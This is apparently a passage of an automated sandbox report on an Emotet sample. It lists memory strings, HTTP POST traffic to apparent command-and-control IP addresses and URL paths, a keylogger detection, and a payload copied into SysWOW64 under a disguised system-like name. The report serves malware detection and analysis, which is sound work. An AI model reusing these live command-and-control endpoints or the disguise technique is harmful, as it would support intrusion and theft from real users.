"PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: unknown HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/0d6H
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/q6G
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/Y
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/w
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758782858.0000028A67B63000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/0d6H
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/q6G
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/Y
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/w
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758782858.0000028A67B63000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00405C24 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 0_2_00405C24
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00405C24 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 0_2_00405C24
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00405C24 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 2_2_00405C24

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.684687959.0000000002234000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933157182.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933217408.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.684411365.0000000002130000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File created: C:\Windows\SysWOW64\mfdvdec\ Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File created: C:\Windows\SysWOW64\mfdvdec\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File deleted: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File deleted: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041A09A 0_2_0041A09A
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041426E 0_2_0041426E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040759C 0_2_0040759C
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004135B9 0_2_004135B9
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041468E 0_2_0041468E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004246B6 0_2_004246B6
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00425A12 0_2_00425A12
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413A8E 0_2_00413A8E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00422B43 0_2_00422B43
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413E62 0_2_00413E62
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00423FBE 0_2_00423FBE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A8220 0_2_022A8220
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7EA0 0_2_022A7EA0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7640 0_2_022A7640
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A64C0 0_2_022A64C0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A1B80 0_2_022A1B80
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139A3E 0_2_02139A3E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E02F 0_2_0213E02F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213805E 0_2_0213805E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021391DE 0_2_021391DE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213371E 0_2_0213371E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213DFFB 0_2_0213DFFB
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E4AF 0_2_0213E4AF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139DBE 0_2_02139DBE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041A09A 0_2_0041A09A
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041426E 0_2_0041426E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040759C 0_2_0040759C
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004135B9 0_2_004135B9
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041468E 0_2_0041468E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004246B6 0_2_004246B6
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00425A12 0_2_00425A12
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413A8E 0_2_00413A8E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00422B43 0_2_00422B43
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413E62 0_2_00413E62
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00423FBE 0_2_00423FBE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A8220 0_2_022A8220
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7EA0 0_2_022A7EA0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7640 0_2_022A7640
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A64C0 0_2_022A64C0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A1B80 0_2_022A1B80
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139A3E 0_2_02139A3E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E02F 0_2_0213E02F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213805E 0_2_0213805E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021391DE 0_2_021391DE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213371E 0_2_0213371E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213DFFB 0_2_0213DFFB
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E4AF 0_2_0213E4AF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139DBE 0_2_02139DBE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041A09A 2_2_0041A09A
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041426E 2_2_0041426E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0040759C 2_2_0040759C
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004135B9 2_2_004135B9
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041468E 2_2_0041468E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004246B6 2_2_004246B6
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00425A12 2_2_00425A12
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00413A8E 2_2_00413A8E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00422B43 2_2_00422B43
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00413E62 2_2_00413E62
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00423FBE 2_2_00423FBE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B8220 2_2_023B8220
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B7640 2_2_023B7640
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B64C0 2_2_023B64C0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1B80 2_2_023B1B80
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B7EA0 2_2_023B7EA0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C9A3E 2_2_022C9A3E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CE02F 2_2_022CE02F
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C805E 2_2_022C805E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C91DE 2_2_022C91DE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C371E 2_2_022C371E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CDFFB 2_2_022CDFFB
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CE4AF 2_2_022CE4AF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C9DBE 2_2_022C9DBE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00412D94 appears 59 times
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00413362 appears 98 times
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00412D94 appears 59 times
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00413362 appears 98 times
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: String function: 00412D94 appears 59 times
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: String function: 00413362 appears 98 times
PE file contains strange resources
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
